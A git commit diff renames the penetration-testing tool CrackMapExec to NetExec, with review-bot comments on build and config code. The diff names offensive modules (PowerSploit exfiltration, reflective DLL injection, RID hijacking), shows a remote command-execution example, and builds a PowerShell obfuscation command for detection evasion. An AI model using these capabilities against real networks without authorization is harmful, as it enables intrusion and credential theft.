rename folders, files, functions, classes, etc to NetExec/nxc

main
Marshall Hallenbeck 2023-09-14 17:07:15 -04:00
parent 2f0b74a492
commit 7886ac1612
193 changed files with 975 additions and 3800 deletions


@ -11,27 +11,27 @@ build
bin bin
dist dist
*.egg-info *.egg-info
cme/data/powersploit/Recon/Dictionaries nxc/data/powersploit/Recon/Dictionaries
cme/data/powersploit/Exfiltration/NTFSParser nxc/data/powersploit/Exfiltration/NTFSParser
cme/data/powersploit/CodeExecution/Invoke-ReflectivePEInjection_Resources nxc/data/powersploit/CodeExecution/Invoke-ReflectivePEInjection_Resources
cme/data/powersploit/Exfiltration/LogonUser nxc/data/powersploit/Exfiltration/LogonUser
cme/data/powersploit/Tests nxc/data/powersploit/Tests
cme/data/netripper/DLL nxc/data/netripper/DLL
cme/data/netripper/Metasploit nxc/data/netripper/Metasploit
cme/data/netripper/NetRipper nxc/data/netripper/NetRipper
cme/data/netripper/Win32 nxc/data/netripper/Win32
cme/data/netripper/Release nxc/data/netripper/Release
cme/data/netripper/minhook nxc/data/netripper/minhook
cme/data/netripper/x64 nxc/data/netripper/x64
cme/data/netripper/*.pdf nxc/data/netripper/*.pdf
cme/data/netripper/*.sln nxc/data/netripper/*.sln
cme/data/invoke-vnc/winvnc nxc/data/invoke-vnc/winvnc
cme/data/invoke-vnc/vncdll nxc/data/invoke-vnc/vncdll
cme/data/invoke-vnc/pebytes.ps1 nxc/data/invoke-vnc/pebytes.ps1
cme/data/invoke-vnc/ReflectiveDLLInjection nxc/data/invoke-vnc/ReflectiveDLLInjection
cme/data/invoke-vnc/*.py nxc/data/invoke-vnc/*.py
cme/data/invoke-vnc/*.bat nxc/data/invoke-vnc/*.bat
cme/data/invoke-vnc/*.msbuild nxc/data/invoke-vnc/*.msbuild
cme/data/invoke-vnc/*.sln nxc/data/invoke-vnc/*.sln
cme/data/RID-Hijacking/modules nxc/data/RID-Hijacking/modules
cme/data/RID-Hijacking/slides nxc/data/RID-Hijacking/slides


@ -12,10 +12,10 @@ A clear and concise description of what the bug is.
**To Reproduce** **To Reproduce**
Steps to reproduce the behavior i.e.: Steps to reproduce the behavior i.e.:
Command: `crackmapexec smb -u username -p password` Command: `netexec smb -u username -p password`
Resulted in: Resulted in:
``` ```
crackmapexec smb 10.10.10.10 -u username -p password -x "whoami" netexec smb 10.10.10.10 -u username -p password -x "whoami"
SMB 10.10.10.10 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:domain) (signing:True) (SMBv1:False) SMB 10.10.10.10 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:domain) (signing:True) (SMBv1:False)
SMB 10.10.10.10 445 DC01 [+] domain\username:password SMB 10.10.10.10 445 DC01 [+] domain\username:password
Traceback (most recent call last): Traceback (most recent call last):
@ -30,7 +30,7 @@ If applicable, add screenshots to help explain your problem.
**Crackmapexec info** **Crackmapexec info**
- OS: [e.g. Kali] - OS: [e.g. Kali]
- Version of CME [e.g. v5.0.2] - Version of nxc [e.g. v5.0.2]
- Installed from: apt/github/pip/docker/...? Please try with latest release before openning an issue - Installed from: apt/github/pip/docker/...? Please try with latest release before openning an issue
**Additional context** **Additional context**


@ -1,4 +1,4 @@
name: CrackMapExec Tests name: NetExec Tests
on: on:
pull_request_review: pull_request_review:
@ -6,7 +6,7 @@ on:
jobs: jobs:
build: build:
name: CrackMapExec Tests for Py${{ matrix.python-version }} name: NetExec Tests for Py${{ matrix.python-version }}
runs-on: ${{ matrix.os }} runs-on: ${{ matrix.os }}
strategy: strategy:
max-parallel: 4 max-parallel: 4
@ -15,7 +15,7 @@ jobs:
python-version: ["3.7", "3.8", "3.9", "3.10", "3.11"] python-version: ["3.7", "3.8", "3.9", "3.10", "3.11"]
steps: steps:
- uses: actions/checkout@v3 - uses: actions/checkout@v3
- name: CrackMapExec tests on ${{ matrix.os }} - name: NetExec tests on ${{ matrix.os }}
uses: actions/setup-python@v4 uses: actions/setup-python@v4
with: with:
python-version: ${{ matrix.python-version }} python-version: ${{ matrix.python-version }}


@ -1,11 +1,11 @@
name: CrackMapExec Build Binaries name: NetExec Build Binaries
on: on:
workflow_dispatch: workflow_dispatch:
jobs: jobs:
build: build:
name: CrackMapExec Tests on ${{ matrix.os }} name: NetExec Tests on ${{ matrix.os }}
runs-on: ${{ matrix.os }} runs-on: ${{ matrix.os }}
strategy: strategy:
max-parallel: 4 max-parallel: 4
@ -14,7 +14,7 @@ jobs:
python-version: ["3.8", "3.9", "3.10", "3.11"] python-version: ["3.8", "3.9", "3.10", "3.11"]
steps: steps:
- uses: actions/checkout@v3 - uses: actions/checkout@v3
- name: CrackMapExec tests on ${{ matrix.os }} - name: NetExec tests on ${{ matrix.os }}
uses: actions/setup-python@v4 uses: actions/setup-python@v4
with: with:
python-version: ${{ matrix.python-version }} python-version: ${{ matrix.python-version }}
@ -22,13 +22,13 @@ jobs:
run: | run: |
pip install shiv pip install shiv
python build_collector.py python build_collector.py
- name: Upload cme binary - name: Upload nxc binary
uses: actions/upload-artifact@master uses: actions/upload-artifact@master
with: with:
name: cme-${{ matrix.os }}-${{ matrix.python-version }} name: nxc-${{ matrix.os }}-${{ matrix.python-version }}
path: bin/cme path: bin/nxc
- name: Upload cmedb binary - name: Upload nxcdb binary
uses: actions/upload-artifact@master uses: actions/upload-artifact@master
with: with:
name: cmedb-${{ matrix.os }}-${{ matrix.python-version }} name: nxcdb-${{ matrix.os }}-${{ matrix.python-version }}
path: bin/cmedb path: bin/nxcdb
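Review bot: Both upload steps reference `actions/upload-artifact@master`, a mutable branch, so the code that packages the renamed `bin/nxc` and `bin/nxcdb` binaries can change without any change in this repository. Pin the action to a release tag or, better, a full commit SHA, e.g. `uses: actions/upload-artifact@<full-commit-sha>`, so the binary-publishing job stays reproducible and auditable. `actions/checkout@v3` and `actions/setup-python@v4` in this file and in the tests workflow are tag-pinned only and would benefit from the same treatment.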

4
.gitignore vendored

@ -1,4 +1,4 @@
data/cme.db data/nxc.db
*.bak *.bak
*.log *.log
.venv .venv
@ -36,7 +36,7 @@ var/
# before PyInstaller builds the exe, so as to inject date/other infos into it. # before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest *.manifest
*.spec *.spec
!crackmapexec.spec !netexec.spec
# Installer logs # Installer logs
pip-log.txt pip-log.txt


@ -4,7 +4,7 @@ ENV LANG=C.UTF-8
ENV LC_ALL=C.UTF-8 ENV LC_ALL=C.UTF-8
ENV PIP_NO_CACHE_DIR=off ENV PIP_NO_CACHE_DIR=off
WORKDIR /usr/src/crackmapexec WORKDIR /usr/src/netexec
RUN apt-get update && \ RUN apt-get update && \
apt-get install -y libffi-dev libxml2-dev libxslt-dev libssl-dev openssl autoconf g++ python3-dev curl git apt-get install -y libffi-dev libxml2-dev libxslt-dev libssl-dev openssl autoconf g++ python3-dev curl git
@ -19,4 +19,4 @@ RUN cargo --help
COPY . . COPY . .
RUN pip install . RUN pip install .
ENTRYPOINT [ "cme" ] ENTRYPOINT [ "nxc" ]


@ -13,7 +13,7 @@ clean:
find . -name '.pytest_cache' -exec rm -rf {} + find . -name '.pytest_cache' -exec rm -rf {} +
tests: tests:
flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics --exclude cme/data/* flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics --exclude nxc/data/*
requirements: requirements:
poetry export --without-hashes -f requirements.txt -o requirements.txt poetry export --without-hashes -f requirements.txt -o requirements.txt


@ -20,7 +20,6 @@ You are on the **latest up-to-date** repository of the project NetExec (nxc) !
# Acknowledgments # Acknowledgments
All the hard work and development over the years from everyone in the CrackMapExec project. All the hard work and development over the years from everyone in the CrackMapExec project.
# Documentation, Tutorials, Examples # Documentation, Tutorials, Examples
See the project's wiki (in development) for documentation and usage examples See the project's wiki (in development) for documentation and usage examples


@ -16,8 +16,8 @@ from shiv.builder import create_archive
from shiv.cli import __version__ as VERSION from shiv.cli import __version__ as VERSION
def build_cme(): def build_nxc():
print("building CME") print("building nxc")
try: try:
shutil.rmtree("bin") shutil.rmtree("bin")
shutil.rmtree("build") shutil.rmtree("build")
@ -28,7 +28,7 @@ def build_cme():
print("remove useless files") print("remove useless files")
os.mkdir("build") os.mkdir("build")
os.mkdir("bin") os.mkdir("bin")
shutil.copytree("cme", "build/cme") shutil.copytree("nxc", "build/nxc")
except Exception as e: except Exception as e:
print(e) print(e)
@ -53,7 +53,7 @@ def build_cme():
env = Environment( env = Environment(
built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"), built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"),
entry_point="cme.crackmapexec:main", entry_point="nxc.netexec:main",
script=None, script=None,
compile_pyc=False, compile_pyc=False,
extend_pythonpath=True, extend_pythonpath=True,
@ -61,7 +61,7 @@ def build_cme():
) )
create_archive( create_archive(
[Path("build").absolute()], [Path("build").absolute()],
Path("bin/cme"), Path("bin/nxc"),
"/usr/bin/env -S python -sE", "/usr/bin/env -S python -sE",
"_bootstrap:bootstrap", "_bootstrap:bootstrap",
env, env,
@ -69,11 +69,11 @@ def build_cme():
) )
def build_cmedb(): def build_nxcdb():
print("building CMEDB") print("building nxcDB")
env = Environment( env = Environment(
built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"), built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"),
entry_point="cme.cmedb:main", entry_point="nxc.nxcdb:main",
script=None, script=None,
compile_pyc=False, compile_pyc=False,
extend_pythonpath=True, extend_pythonpath=True,
@ -81,7 +81,7 @@ def build_cmedb():
) )
create_archive( create_archive(
[Path("build").absolute()], [Path("build").absolute()],
Path("bin/cmedb"), Path("bin/nxcdb"),
"/usr/bin/env -S python -sE", "/usr/bin/env -S python -sE",
"_bootstrap:bootstrap", "_bootstrap:bootstrap",
env, env,
@ -91,8 +91,8 @@ def build_cmedb():
if __name__ == "__main__": if __name__ == "__main__":
try: try:
build_cme() build_nxc()
build_cmedb() build_nxcdb()
except: except:
pass pass
finally: finally:
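Review bot: The `__main__` block still wraps `build_nxc()` and `build_nxcdb()` in a bare `except: pass`, so a failure introduced by the rename (a wrong `entry_point` string, or a missing `nxc` directory for `copytree`) is swallowed and the script can still exit as if the build succeeded. Catch and report instead, e.g. `except Exception as e:` followed by `print(f"build failed: {e}")` and `raise`, so the workflow fails rather than reaching the upload steps with no binary. The `finally:` body lies outside the hunk, so the cleanup it performs is not visible here.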


@ -1,48 +0,0 @@
# coding=utf-8
import os
from os.path import join as path_join
import configparser
from cme.paths import CME_PATH, DATA_PATH
from cme.first_run import first_run_setup
from cme.logger import cme_logger
from ast import literal_eval
cme_default_config = configparser.ConfigParser()
cme_default_config.read(path_join(DATA_PATH, "cme.conf"))
cme_config = configparser.ConfigParser()
cme_config.read(os.path.join(CME_PATH, "cme.conf"))
if "CME" not in cme_config.sections():
first_run_setup()
cme_config.read(os.path.join(CME_PATH, "cme.conf"))
# Check if there are any missing options in the config file
for section in cme_default_config.sections():
for option in cme_default_config.options(section):
if not cme_config.has_option(section, option):
cme_logger.display(f"Adding missing option '{option}' in config section '{section}' to cme.conf")
cme_config.set(section, option, cme_default_config.get(section, option))
with open(path_join(CME_PATH, "cme.conf"), "w") as config_file:
cme_config.write(config_file)
#!!! THESE OPTIONS HAVE TO EXIST IN THE DEFAULT CONFIG FILE !!!
cme_workspace = cme_config.get("CME", "workspace", fallback="default")
pwned_label = cme_config.get("CME", "pwn3d_label", fallback="Pwn3d!")
audit_mode = cme_config.get("CME", "audit_mode", fallback=False)
reveal_chars_of_pwd = int(cme_config.get("CME", "reveal_chars_of_pwd", fallback=0))
config_log = cme_config.getboolean("CME", "log_mode", fallback=False)
ignore_opsec = cme_config.getboolean("CME", "ignore_opsec", fallback=False)
host_info_colors = literal_eval(cme_config.get("CME", "host_info_colors", fallback=["green", "red", "yellow", "cyan"]))
if len(host_info_colors) != 4:
cme_logger.error("Config option host_info_colors must have 4 values! Using default values.")
host_info_colors = cme_default_config.get("CME", "host_info_colors")
# this should probably be put somewhere else, but if it's in the config helpers, there is a circular import
def process_secret(text):
hidden = text[:reveal_chars_of_pwd]
return text if not audit_mode else hidden+audit_mode * 8


@ -1,3 +0,0 @@
from rich.console import Console
cme_console = Console(soft_wrap=True, tab_size=4)


@ -1,15 +0,0 @@
import os
import sys
import cme
CME_PATH = os.path.expanduser("~/.cme")
TMP_PATH = os.path.join("/tmp", "cme_hosted")
if os.name == "nt":
TMP_PATH = os.getenv("LOCALAPPDATA") + "\\Temp\\cme_hosted"
if hasattr(sys, "getandroidapilevel"):
TMP_PATH = os.path.join("/data", "data", "com.termux", "files", "usr", "tmp", "cme_hosted")
WS_PATH = os.path.join(CME_PATH, "workspaces")
CERT_PATH = os.path.join(CME_PATH, "cme.pem")
CONFIG_PATH = os.path.join(CME_PATH, "cme.conf")
WORKSPACE_DIR = os.path.join(CME_PATH, "workspaces")
DATA_PATH = os.path.join(os.path.dirname(cme.__file__), "data")


@ -12,7 +12,7 @@
poetry2nix.overlay poetry2nix.overlay
(final: prev: { (final: prev: {
# The application # The application
CrackMapExec = prev.poetry2nix.mkPoetryApplication { NetExec = prev.poetry2nix.mkPoetryApplication {
projectDir = ./.; projectDir = ./.;
}; };
}) })
@ -26,11 +26,11 @@
in in
{ {
apps = { apps = {
CrackMapExec = pkgs.CrackMapExec; NetExec = pkgs.NetExec;
}; };
defaultApp = pkgs.CrackMapExec; defaultApp = pkgs.NetExec;
packages = { CrackMapExec = pkgs.CrackMapExec; }; packages = { NetExec = pkgs.NetExec; };
})); }));
} }


@ -3,12 +3,12 @@
block_cipher = None block_cipher = None
a = Analysis(['./cme/crackmapexec.py'], a = Analysis(['./nxc/netexec.py'],
pathex=['./cme'], pathex=['./nxc'],
binaries=[], binaries=[],
datas=[('./cme/protocols', 'cme/protocols'),('./cme/data', 'cme/data'),('./cme/modules', 'cme/modules')], datas=[('./nxc/protocols', 'nxc/protocols'),('./nxc/data', 'nxc/data'),('./nxc/modules', 'nxc/modules')],
hiddenimports=['cme.protocols.mssql.mssqlexec', 'cme.connection', 'impacket.examples.secretsdump', 'impacket.dcerpc.v5.lsat', 'impacket.dcerpc.v5.transport', 'impacket.dcerpc.v5.lsad', 'cme.servers.smb', 'cme.protocols.smb.wmiexec', 'cme.protocols.smb.atexec', 'cme.protocols.smb.smbexec', 'cme.protocols.smb.mmcexec', 'cme.protocols.smb.smbspider', 'cme.protocols.smb.passpol', 'paramiko', 'pypsrp.client', 'pywerview.cli.helpers', 'impacket.tds', 'impacket.version', 'cme.helpers.bash', 'pylnk3', 'lsassy','win32timezone', 'impacket.tds', 'impacket.ldap.ldap', 'impacket.tds'], hiddenimports=['nxc.protocols.mssql.mssqlexec', 'nxc.connection', 'impacket.examples.secretsdump', 'impacket.dcerpc.v5.lsat', 'impacket.dcerpc.v5.transport', 'impacket.dcerpc.v5.lsad', 'nxc.servers.smb', 'nxc.protocols.smb.wmiexec', 'nxc.protocols.smb.atexec', 'nxc.protocols.smb.smbexec', 'nxc.protocols.smb.mmcexec', 'nxc.protocols.smb.smbspider', 'nxc.protocols.smb.passpol', 'paramiko', 'pypsrp.client', 'pywerview.cli.helpers', 'impacket.tds', 'impacket.version', 'nxc.helpers.bash', 'pylnk3', 'lsassy','win32timezone', 'impacket.tds', 'impacket.ldap.ldap', 'impacket.tds'],
hookspath=['./cme/.hooks'], hookspath=['./nxc/.hooks'],
runtime_hooks=[], runtime_hooks=[],
excludes=[], excludes=[],
win_no_prefer_redirects=False, win_no_prefer_redirects=False,
@ -23,7 +23,7 @@ exe = EXE(pyz,
a.zipfiles, a.zipfiles,
a.datas, a.datas,
[], [],
name='crackmapexec', name='netexec',
debug=False, debug=False,
bootloader_ignore_signals=False, bootloader_ignore_signals=False,
strip=False, strip=False,
@ -31,4 +31,4 @@ exe = EXE(pyz,
upx_exclude=[], upx_exclude=[],
runtime_tmpdir=None, runtime_tmpdir=None,
console=True, console=True,
icon='./cme/data/cme.ico' ) icon='./nxc/data/nxc.ico' )


@ -4,32 +4,32 @@
import argparse import argparse
import sys import sys
from argparse import RawTextHelpFormatter from argparse import RawTextHelpFormatter
from cme.loaders.protocolloader import ProtocolLoader from nxc.loaders.protocolloader import ProtocolLoader
from cme.helpers.logger import highlight from nxc.helpers.logger import highlight
from termcolor import colored from termcolor import colored
from cme.logger import cme_logger from nxc.logger import nxc_logger
import importlib.metadata import importlib.metadata
def gen_cli_args(): def gen_cli_args():
VERSION = importlib.metadata.version("crackmapexec") VERSION = importlib.metadata.version("netexec")
CODENAME = "John Wick" CODENAME = "A New Beginning"
parser = argparse.ArgumentParser(description=f""" parser = argparse.ArgumentParser(description=f"""
______ .______ ___ ______ __ ___ .___ ___. ___ .______ _______ ___ ___ _______ ______ _ _ _ _____
/ || _ \ / \ / || |/ / | \/ | / \ | _ \ | ____|\ \ / / | ____| / | | \ | | ___ | |_ | ____| __ __ ___ ___
| ,----'| |_) | / ^ \ | ,----'| ' / | \ / | / ^ \ | |_) | | |__ \ V / | |__ | ,----' | \| | / _ \ | __| | _| \ \/ / / _ \ / __|
| | | / / /_\ \ | | | < | |\/| | / /_\ \ | ___/ | __| > < | __| | | | |\ | | __/ | |_ | |___ > < | __/ | (__
| `----.| |\ \----. / _____ \ | `----.| . \ | | | | / _____ \ | | | |____ / . \ | |____ | `----. |_| \_| \___| \__| |_____| /_/\_\ \___| \___|
\______|| _| `._____|/__/ \__\ \______||__|\__\ |__| |__| /__/ \__\ | _| |_______|/__/ \__\ |_______| \______|
A swiss army knife for pentesting networks The network execution tool
Forged by @byt3bl33d3r and @mpgn_x64 using the powah of dank memes. Maintained as an open source project by @NeffIsBack, @MJHallenbeck, @_zblurx
Maintained as an open source project by @NeffIsBack, @MJHallenbeck, @_zblurx
For documentation and usage examples, visit: https://www.netexec.wiki/
{highlight('Version', 'red')} : {highlight(VERSION)} {highlight('Version', 'red')} : {highlight(VERSION)}
{highlight('Codename', 'red')}: {highlight(CODENAME)} {highlight('Codename', 'red')}: {highlight(CODENAME)}
""", """,
formatter_class=RawTextHelpFormatter, formatter_class=RawTextHelpFormatter,
) )
@ -59,7 +59,7 @@ def gen_cli_args():
) )
parser.add_argument("--verbose", action="store_true", help="enable verbose output") parser.add_argument("--verbose", action="store_true", help="enable verbose output")
parser.add_argument("--debug", action="store_true", help="enable debug level information") parser.add_argument("--debug", action="store_true", help="enable debug level information")
parser.add_argument("--version", action="store_true", help="Display CME version") parser.add_argument("--version", action="store_true", help="Display nxc version")
# we do module arg parsing here so we can reference the module_list attribute below # we do module arg parsing here so we can reference the module_list attribute below
module_parser = argparse.ArgumentParser(add_help=False) module_parser = argparse.ArgumentParser(add_help=False)
@ -189,7 +189,7 @@ def gen_cli_args():
protocol_object = p_loader.load_protocol(protocols[protocol]["argspath"]) protocol_object = p_loader.load_protocol(protocols[protocol]["argspath"])
subparsers = protocol_object.proto_args(subparsers, std_parser, module_parser) subparsers = protocol_object.proto_args(subparsers, std_parser, module_parser)
except: except:
cme_logger.exception(f"Error loading proto_args from proto_args.py file in protocol folder: {protocol}") nxc_logger.exception(f"Error loading proto_args from proto_args.py file in protocol folder: {protocol}")
if len(sys.argv) == 1: if len(sys.argv) == 1:
parser.print_help() parser.print_help()

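--- /dev/null
+++ b/nxc/config.py
@@ -0,0 +1,48 @@
+# coding=utf-8
+import os
+from os.path import join as path_join
+import configparser
+from nxc.paths import nxc_PATH, DATA_PATH
+from nxc.first_run import first_run_setup
+from nxc.logger import nxc_logger
+from ast import literal_eval
+nxc_default_config = configparser.ConfigParser()
+nxc_default_config.read(path_join(DATA_PATH, "nxc.conf"))
+nxc_config = configparser.ConfigParser()
+nxc_config.read(os.path.join(nxc_PATH, "nxc.conf"))
+if "nxc" not in nxc_config.sections():
+first_run_setup()
+nxc_config.read(os.path.join(nxc_PATH, "nxc.conf"))
+# Check if there are any missing options in the config file
+for section in nxc_default_config.sections():
+for option in nxc_default_config.options(section):
+if not nxc_config.has_option(section, option):
+nxc_logger.display(f"Adding missing option '{option}' in config section '{section}' to nxc.conf")
+nxc_config.set(section, option, nxc_default_config.get(section, option))
+with open(path_join(nxc_PATH, "nxc.conf"), "w") as config_file:
+nxc_config.write(config_file)
+#!!! THESE OPTIONS HAVE TO EXIST IN THE DEFAULT CONFIG FILE !!!
+nxc_workspace = nxc_config.get("nxc", "workspace", fallback="default")
+pwned_label = nxc_config.get("nxc", "pwn3d_label", fallback="Pwn3d!")
+audit_mode = nxc_config.get("nxc", "audit_mode", fallback=False)
+reveal_chars_of_pwd = int(nxc_config.get("nxc", "reveal_chars_of_pwd", fallback=0))
+config_log = nxc_config.getboolean("nxc", "log_mode", fallback=False)
+ignore_opsec = nxc_config.getboolean("nxc", "ignore_opsec", fallback=False)
+host_info_colors = literal_eval(nxc_config.get("nxc", "host_info_colors", fallback=["green", "red", "yellow", "cyan"]))
+if len(host_info_colors) != 4:
+nxc_logger.error("Config option host_info_colors must have 4 values! Using default values.")
+host_info_colors = nxc_default_config.get("nxc", "host_info_colors")
+# this should probably be put somewhere else, but if it's in the config helpers, there is a circular import
+def process_secret(text):
+hidden = text[:reveal_chars_of_pwd]
+return text if not audit_mode else hidden+audit_mode * 8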
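Review bot: `host_info_colors` has two paths that do not produce a four-element list. If the option is ever absent, `fallback=["green", "red", "yellow", "cyan"]` hands a list to `literal_eval`, which accepts only a string or AST node and raises `ValueError`; and when the length check fails, the recovery assigns the raw string from `nxc_default_config.get(...)` without evaluating it. Pass the fallback as a string, `fallback='["green", "red", "yellow", "cyan"]'`, and wrap the recovery as `literal_eval(nxc_default_config.get("nxc", "host_info_colors"))`. Separately, `audit_mode` is read with plain `get`, so in `process_secret` any non-empty value, including the text `False`, enables masking and is itself repeated as the mask; a short comment stating that the option holds the mask character would prevent a misconfiguration that leaves secrets unmasked or oddly masked in output.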


@ -11,10 +11,10 @@ from functools import wraps
from time import sleep from time import sleep
from ipaddress import ip_address from ipaddress import ip_address
from cme.config import pwned_label from nxc.config import pwned_label
from cme.helpers.logger import highlight from nxc.helpers.logger import highlight
from cme.logger import cme_logger, CMEAdapter from nxc.logger import nxc_logger, NXCAdapter
from cme.context import Context from nxc.context import Context
from impacket.dcerpc.v5 import transport from impacket.dcerpc.v5 import transport
@ -86,7 +86,7 @@ class connection(object):
self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache self.use_kcache = None if not self.args.use_kcache else self.args.use_kcache
self.failed_logins = 0 self.failed_logins = 0
self.local_ip = None self.local_ip = None
self.logger = cme_logger self.logger = nxc_logger
try: try:
self.host = gethost_addrinfo(self.hostname) self.host = gethost_addrinfo(self.hostname)
@ -174,7 +174,7 @@ class connection(object):
def call_modules(self): def call_modules(self):
for module in self.module: for module in self.module:
self.logger.debug(f"Loading module {module.name} - {module}") self.logger.debug(f"Loading module {module.name} - {module}")
module_logger = CMEAdapter( module_logger = NXCAdapter(
extra={ extra={
"module_name": module.name.upper(), "module_name": module.name.upper(),
"host": self.host, "host": self.host,

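--- /dev/null
+++ b/nxc/console.py
@@ -0,0 +1,3 @@
+from rich.console import Console
+nxc_console = Console(soft_wrap=True, tab_size=4)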


@ -11,11 +11,11 @@ class Context:
setattr(self, key, value) setattr(self, key, value)
self.db = db self.db = db
self.log_folder_path = os.path.join(os.path.expanduser("~/.cme"), "logs") self.log_folder_path = os.path.join(os.path.expanduser("~/.nxc"), "logs")
self.localip = None self.localip = None
self.conf = configparser.ConfigParser() self.conf = configparser.ConfigParser()
self.conf.read(os.path.expanduser("~/.cme/cme.conf")) self.conf.read(os.path.expanduser("~/.nxc/nxc.conf"))
self.log = logger self.log = logger
# self.log.debug = logging.debug # self.log.debug = logging.debug
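Review bot: `Context.__init__` hard-codes `~/.nxc` and `~/.nxc/nxc.conf` as string literals instead of using the path constants this commit renames (`nxc_PATH` and `CONFIG_PATH`, imported from `nxc.paths` in the first-run setup section), and `write_log` in the logger helper section repeats the literal `~/.nxc`. Each literal had to be edited by hand for this rename and will silently diverge if the home directory moves again, leaving logs or config reads pointed at a stale location. Prefer `self.log_folder_path = os.path.join(nxc_PATH, "logs")` and `self.conf.read(CONFIG_PATH)`, provided importing `nxc.paths` here does not create an import cycle. The class body starts outside the hunk.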


@ -1,4 +1,4 @@
[CME] [nxc]
workspace = default workspace = default
last_used_db = smb last_used_db = smb
pwn3d_label = Pwn3d! pwn3d_label = Pwn3d!


Before

Width:  |  Height:  |  Size: 159 KiB

After

Width:  |  Height:  |  Size: 159 KiB


@ -5,19 +5,19 @@ from os import mkdir
from os.path import exists from os.path import exists
from os.path import join as path_join from os.path import join as path_join
import shutil import shutil
from cme.paths import CME_PATH, CONFIG_PATH, TMP_PATH, DATA_PATH from nxc.paths import nxc_PATH, CONFIG_PATH, TMP_PATH, DATA_PATH
from cme.cmedb import initialize_db from nxc.nxcdb import initialize_db
from cme.logger import cme_logger from nxc.logger import nxc_logger
def first_run_setup(logger=cme_logger): def first_run_setup(logger=nxc_logger):
if not exists(TMP_PATH): if not exists(TMP_PATH):
mkdir(TMP_PATH) mkdir(TMP_PATH)
if not exists(CME_PATH): if not exists(nxc_PATH):
logger.display("First time use detected") logger.display("First time use detected")
logger.display("Creating home directory structure") logger.display("Creating home directory structure")
mkdir(CME_PATH) mkdir(nxc_PATH)
folders = ( folders = (
"logs", "logs",
@ -28,16 +28,16 @@ def first_run_setup(logger=cme_logger):
"screenshots", "screenshots",
) )
for folder in folders: for folder in folders:
if not exists(path_join(CME_PATH, folder)): if not exists(path_join(nxc_PATH, folder)):
logger.display(f"Creating missing folder {folder}") logger.display(f"Creating missing folder {folder}")
mkdir(path_join(CME_PATH, folder)) mkdir(path_join(nxc_PATH, folder))
initialize_db(logger) initialize_db(logger)
if not exists(CONFIG_PATH): if not exists(CONFIG_PATH):
logger.display("Copying default configuration file") logger.display("Copying default configuration file")
default_path = path_join(DATA_PATH, "cme.conf") default_path = path_join(DATA_PATH, "nxc.conf")
shutil.copy(default_path, CME_PATH) shutil.copy(default_path, nxc_PATH)
# if not exists(CERT_PATH): # if not exists(CERT_PATH):
# logger.display('Generating SSL certificate') # logger.display('Generating SSL certificate')
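Review bot: `mkdir(nxc_PATH)` and the per-folder `mkdir(path_join(nxc_PATH, folder))` create the new home tree with umask-default permissions, yet the tree holds `logs` and `screenshots` and, judging by the `initialize_db(logger)` call, the workspace databases. Creating it owner-only, `mkdir(nxc_PATH, mode=0o700)`, keeps collected engagement data away from other local users on a shared host. Because the directory moves from `~/.cme` to `~/.nxc`, existing data in the old directory is neither migrated nor mentioned; a one-line `logger.display(...)` notice on first run would tell operators that old logs and databases remain on disk and need their own cleanup. The function continues past the end of the hunk.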


@ -1,7 +1,7 @@
#!/usr/bin/env python3 #!/usr/bin/env python3
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
import os import os
from cme.paths import DATA_PATH from nxc.paths import DATA_PATH
def get_script(path): def get_script(path):


@ -6,7 +6,7 @@ from termcolor import colored
def write_log(data, log_name): def write_log(data, log_name):
logs_dir = os.path.join(os.path.expanduser("~/.cme"), "logs") logs_dir = os.path.join(os.path.expanduser("~/.nxc"), "logs")
with open(os.path.join(logs_dir, log_name), "w") as log_output: with open(os.path.join(logs_dir, log_name), "w") as log_output:
log_output.write(data) log_output.write(data)


@ -21,7 +21,7 @@ References:
- https://www.powershellgallery.com/packages/SDDLParser/0.5.0/Content/SDDLParserADObjects.ps1 - https://www.powershellgallery.com/packages/SDDLParser/0.5.0/Content/SDDLParserADObjects.ps1
This library is, for the moment, not present in the Impacket version used by CrackMapExec, so I add it manually in helpers. This library is, for the moment, not present in the Impacket version used by NetExec, so I add it manually in helpers.
""" """
SCHEMA_OBJECTS = { SCHEMA_OBJECTS = {


@ -6,9 +6,9 @@ from sys import exit
from string import ascii_lowercase from string import ascii_lowercase
from random import choice, sample from random import choice, sample
from subprocess import call from subprocess import call
from cme.helpers.misc import which from nxc.helpers.misc import which
from cme.logger import cme_logger from nxc.logger import nxc_logger
from cme.paths import CME_PATH, DATA_PATH from nxc.paths import nxc_PATH, DATA_PATH
from base64 import b64encode from base64 import b64encode
obfuscate_ps_scripts = False obfuscate_ps_scripts = False
@ -30,24 +30,24 @@ def is_powershell_installed():
def obfs_ps_script(path_to_script): def obfs_ps_script(path_to_script):
ps_script = path_to_script.split("/")[-1] ps_script = path_to_script.split("/")[-1]
obfs_script_dir = os.path.join(CME_PATH, "obfuscated_scripts") obfs_script_dir = os.path.join(nxc_PATH, "obfuscated_scripts")
obfs_ps_script = os.path.join(obfs_script_dir, ps_script) obfs_ps_script = os.path.join(obfs_script_dir, ps_script)
if is_powershell_installed() and obfuscate_ps_scripts: if is_powershell_installed() and obfuscate_ps_scripts:
if os.path.exists(obfs_ps_script): if os.path.exists(obfs_ps_script):
cme_logger.display("Using cached obfuscated Powershell script") nxc_logger.display("Using cached obfuscated Powershell script")
with open(obfs_ps_script, "r") as script: with open(obfs_ps_script, "r") as script:
return script.read() return script.read()
cme_logger.display("Performing one-time script obfuscation, go look at some memes cause this can take a bit...") nxc_logger.display("Performing one-time script obfuscation, go look at some memes cause this can take a bit...")
invoke_obfs_command = f"powershell -C 'Import-Module {get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1')};Invoke-Obfuscation -ScriptPath {get_ps_script(path_to_script)} -Command \"TOKEN,ALL,1,OUT {obfs_ps_script}\" -Quiet'" invoke_obfs_command = f"powershell -C 'Import-Module {get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1')};Invoke-Obfuscation -ScriptPath {get_ps_script(path_to_script)} -Command \"TOKEN,ALL,1,OUT {obfs_ps_script}\" -Quiet'"
